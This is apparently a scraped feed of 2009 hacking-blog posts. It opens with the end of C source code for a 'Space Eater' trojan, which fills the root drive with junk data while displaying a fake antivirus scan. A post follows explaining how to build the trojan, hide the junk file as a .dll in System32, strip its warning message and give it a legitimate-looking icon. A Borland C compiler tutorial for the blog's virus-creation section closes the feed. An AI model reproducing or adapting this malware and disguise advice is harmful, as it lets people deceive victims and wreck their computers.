/>textcolor(WHITE);<br />gotoxy(12,18);<br />while(1)<br />{<br />for(r=1;r<4;r++)<br />{<br />for(i=1;i<900000;i++)<br />{<br />status=fputs(ch,b);<br />if(status==EOF)<br />{<br />textcolor(WHITE);<br />vir_count=random(120);<br />draw();<br />gotoxy(12,8);<br />cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);<br />gotoxy(12,10);<br />cprintf("PRESS ANY KEY TO CLOSE...");<br />getch();<br />break;<br />}<br />}<br />cputs(".");<br />if(status==EOF) break;<br />}<br />if(status==EOF) break;<br />}<br />exit(0);<br />}<br /><br />void showstatus()<br />{<br />gotoxy(12,8);<br />cputs("SCANNING THE SYSTEM FOR THREATS");<br />gotoxy(12,10);<br />cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");<br />gotoxy(12,13);<br />cputs("SCAN IN PROGRESS. PLEASE WAIT...");<br />}Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-78103359724673585902009-07-24T06:35:00.001-07:002009-07-24T06:35:56.001-07:00How to Make a Trojan Horse<p style="text-align: center;"><img class="size-medium wp-image-1128 aligncenter" title="How to Make a Trojan" src="http://www.gohacking.com/wp-content/uploads/2009/04/trojan-300x246.jpg" alt="How to Make a Trojan" width="300" height="246" /></p> <p>Most of you may be curious to know about <strong>how to make a Trojan </strong>or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you <strong>how to make a simple Trojan on your own </strong>using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…</p> <p>Before I move to explain the features of this Trojan you need to know <a href="http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29" target="_blank">what exactly is a Trojan horse</a> and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.</p> <p><strong>Now lets move to the working of our Trojan</strong></p> <p>The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the <strong>WindowsSystem32</strong> folder with the <strong>.dll </strong>extension. Since the junk file has the <strong>.dll</strong> extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.</p> <p><strong>The algorithm of the Trojan is as follows</strong></p> <p>1. Search for the <strong>root drive</strong></p> <p>2. Navigate to <strong>WindowsSystem32</strong> on the root drive</p> <p>3. Create the file named “<strong>spceshot.dll</strong>”</p> <p>4. Start <strong>dumping the junk data </strong>onto the above file and keep increasing it’s size until the drive is full</p> <p>5. Once the drive is full, <strong>stop the process</strong>.</p> <p>You can<strong> </strong><a rel="nofollow" href="http://www.gohacking.com/downloads/source_codes/Space_Eater.rar"><strong>download</strong></a> the Trojan source code<strong> </strong><a rel="nofollow" href="http://www.gohacking.com/downloads/source_codes/Space_Eater.rar"><strong>HERE</strong></a>. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.</p> <h3>How to compile, test and remove the damage?</h3> <p><strong>Compilation:</strong></p> <p>For step-by-step compilation guide, refer my post <a href="http://www.gohacking.com/2009/07/how-to-compile-c-programs.html" target="_blank">How to compile C Programs</a>.</p> <p><strong>Testing:</strong></p> <p>To test the Trojan, just run the <strong>SpaceEater.exe</strong> file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.</p> <p><em>NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.</em></p> <p><strong>How to remove the Damage and free up the space?</strong></p> <p>To remove the damage and free up the space, just type the following in the “<strong>run</strong>” dialog box.</p> <p><strong>%systemroot%system32</strong></p> <p>Now search for the file “<strong>spceshot.dll</strong>“. Just delete it and you’re done. No need to re-format the hard disk.</p> <p><strong><em> NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: </em></strong><a href="http://www.gohacking.com/2008/10/how-to-change-icon-of-exe-file.html"><strong><em>How to Change the ICON of an EXE file ?</em></strong></a></p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-79885806775637866372009-07-24T06:34:00.001-07:002009-07-24T06:34:32.216-07:00How to Compile C Programs<!-- Promote Posts --> <!--<div style="width:556px;height:175px;border:2px solid #ffe400;padding:5px;"> <p> <a href="http://www.gohacking.com/recom_products/sniper_spy.php" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed!</u></a><br /><span style="font-size:16px;color:#000000;">Access Any PC from Anywhere. Spy on Any Email to Find Out the Truth! Award Winning Remote PC Surveillance Software.</span><br /><a href="http://www.gohacking.com/products/hacking-security-books" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Want to Learn Hacking? ...But Don't Know Where to Start?</u></a><br /><span style="font-size:16px;color:#000000;">Learn Underground Hacker Techniques <b>from the Basics</b>. Become One with the Hackers. Start Your Journey Today! </span></p> </div><br />--> <!-- End Promote Posts --> <!-- Begin BidVertiser code --> <!--<script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=98267&bid=384485" type="text/javascript"><br /></script> <noscript><a href="http://www.bidvertiser.com">internet advertising</a></noscript>--> <!-- End BidVertiser code --> <p><img class="alignleft" title="Compiling C Programs" src="http://www.gohacking.com/wp-content/uploads/2009/07/CPP.jpg" alt="" width="280" height="169" />In many of my previous posts especially in the <a href="http://www.gohacking.com/category/virus-creation" target="_blank">VIRUS CREATION</a> section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.</p> <h3>How to install Borland C++ compiler</h3> <p>1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.</p> <p><a rel="nofollow" href="http://www.codegear.com/downloads/free/cppbuilder" target="_blank">http://www.codegear.com/downloads/free/cppbuilder</a></p> <p>2. After you download, run <strong>freecommandlinetools.exe</strong>. The default installation path would be</p> <p>C:\Borland\BCC55</p> <h3>How to configure Borland C++ compiler</h3> <p>1. After you install Borland C++ compier, create two new Text Documents</p> <p>2. Open the first <strong>New Text Document.txt</strong> file and add the following two lines into it</p> <p><em>-I”c:\Borland\Bcc55\include”</em></p> <p><em>-L”c:\Borland\Bcc55\lib”</em></p> <p>Save changes and close the file. Now rename the file from <strong>New Text Document.txt </strong>to <strong>bcc32.cfg.</strong></p> <p>3. Open the second <strong>New Text Document (2).txt</strong> file and add the following line into it</p> <p><span style="color: rgb(51, 51, 51);"><em><span style="color: rgb(0, 0, 0);">-L”c:\Borland\Bcc55\lib”</span></em></span></p> <p>Save changes and close the file. Now rename the file from <strong>New Text Document (2).txt </strong>to <strong>ilink32.cfg.</strong></p> <p>4. Now copy the two files <strong>bcc32.cfg</strong> and <strong>ilink32.cfg</strong>, navigate to <em><strong>C:\Borland\BCC55\Bin</strong></em> and paste them.</p> <h3>How to compile the C source code (.C files)</h3> <p>1. You need to place the .C (example.c) file to be compiled in the following location</p> <p><em>C:\Borland\BCC55\Bin</em></p> <p>2. Now goto command prompt (Start->Run->type <strong>cmd</strong>->Enter)</p> <p>3. Make the following path as the present working directory (use CD command)</p> <p><em>C:\Borland\BCC55\Bin</em></p> <p>4. To compile the file (example.c) use the following command</p> <p><strong>bcc32 example.c</strong></p> <p>5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (<em>C:\Borland\BCC55\Bin).</em></p> <p>6. Now you have successfully compiled the source code into an executable file(.exe file). </p> <p><em><strong>NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).</strong></em></p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0